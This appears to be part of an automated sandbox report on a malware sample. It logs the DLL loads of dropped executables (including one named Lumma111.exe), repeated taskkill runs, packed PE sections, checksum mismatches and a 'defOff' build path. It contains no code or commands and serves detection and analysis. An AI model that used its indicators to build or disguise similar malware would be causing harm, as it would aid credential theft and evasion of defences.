Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: C:\Program Files\Mozilla Firefox\firefox.exe File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\compatibility.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 1858048 > 1048576
Source: file.exe Static PE information: Raw size of hwqxmwlo is bigger than: 0x100000 < 0x193c00
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: c8a61f4196.exe, 00000021.00000003.2901113043.00000000050E0000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.9d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hwqxmwlo:EW;mfzfwoib:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hwqxmwlo:EW;mfzfwoib:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 1.2.skotes.exe.a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hwqxmwlo:EW;mfzfwoib:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hwqxmwlo:EW;mfzfwoib:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hwqxmwlo:EW;mfzfwoib:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hwqxmwlo:EW;mfzfwoib:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hwqxmwlo:EW;mfzfwoib:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hwqxmwlo:EW;mfzfwoib:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Unpacked PE file: 9.2.Lumma111.exe.380000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ucbvvkym:EW;dvaxjyps:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ucbvvkym:EW;dvaxjyps:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Unpacked PE file: 10.2.cfc45d1c7c.exe.770000.0.unpack :EW;.rsrc:W;.idata :W; :EW;akxghhwi:EW;yjeyyxpl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;akxghhwi:EW;yjeyyxpl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Unpacked PE file: 11.2.686764db73.exe.150000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lgjpmlrc:EW;fjrpqkrp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lgjpmlrc:EW;fjrpqkrp:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Unpacked PE file: 12.2.cfc45d1c7c.exe.770000.0.unpack :EW;.rsrc:W;.idata :W; :EW;akxghhwi:EW;yjeyyxpl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;akxghhwi:EW;yjeyyxpl:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Unpacked PE file: 30.2.686764db73.exe.150000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lgjpmlrc:EW;fjrpqkrp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lgjpmlrc:EW;fjrpqkrp:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: Lumma111.exe.6.dr Static PE information: real checksum: 0x1cfc23 should be: 0x1d7d2c
Source: random[1].exe.6.dr Static PE information: real checksum: 0x43a3d5 should be: 0x436398
Source: random[1].exe1.6.dr Static PE information: real checksum: 0x1db102 should be: 0x1dc122
Source: Lumma111[1].exe.6.dr Static PE information: real checksum: 0x1cfc23 should be: 0x1d7d2c
Source: c8a61f4196.exe.6.dr Static PE information: real checksum: 0x2b146b should be: 0x2acfe4
Source: random[1].exe2.6.dr Static PE information: real checksum: 0x1c7678 should be: 0x1c4691
Source: 686764db73.exe.6.dr Static PE information: real checksum: 0x1c7678 should be: 0x1c4691
Source: cfc45d1c7c.exe.6.dr Static PE information: real checksum: 0x1db102 should be: 0x1dc122
Source: ae87049195.exe.6.dr Static PE information: real checksum: 0x43a3d5 should be: 0x436398
Source: file.exe Static PE information: real checksum: 0x1cd039 should be: 0x1d39cb
Source: skotes.exe.0.dr Static PE information: real checksum: 0x1cd039 should be: 0x1d39cb
Source: random[1].exe0.6.dr Static PE information: real checksum: 0x2b146b should be: 0x2acfe4
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: hwqxmwlo
Source: file.exe Static PE information: section name: mfzfwoib
Source: file.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: hwqxmwlo
Source: skotes.exe.0.dr Static PE information: section name: mfzfwoib
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: mouszfiw
Source: random[1].exe.6.dr Static PE information: section name: uiwjboqc
Source: random[1].exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name: fysdnnem
Source: random[1].exe0.6.dr Static PE information: section name: nvcnsgcm
Source: random[1].exe0.6.dr Static PE information: section name: .taggant
Source: ae87049195.exe.6.dr Static PE information: section name:
Source: ae87049195.exe.6.dr Static PE information: section name: .rsrc
Source: ae87049195.exe.6.dr Static PE information: section name: .idata
Source: ae87049195.exe.6.dr Static PE information: section name:
Source: ae87049195.exe.6.dr Static PE information: section name: mouszfiw
Source: ae87049195.exe.6.dr Static PE information: section name: uiwjboqc
Source: ae87049195.exe.6.dr Static PE information: section name: .taggant
Source: c8a61f4196.exe.6.dr Static PE information: section name:
Source: c8a61f4196.exe.6.dr Static PE information: section name: .idata
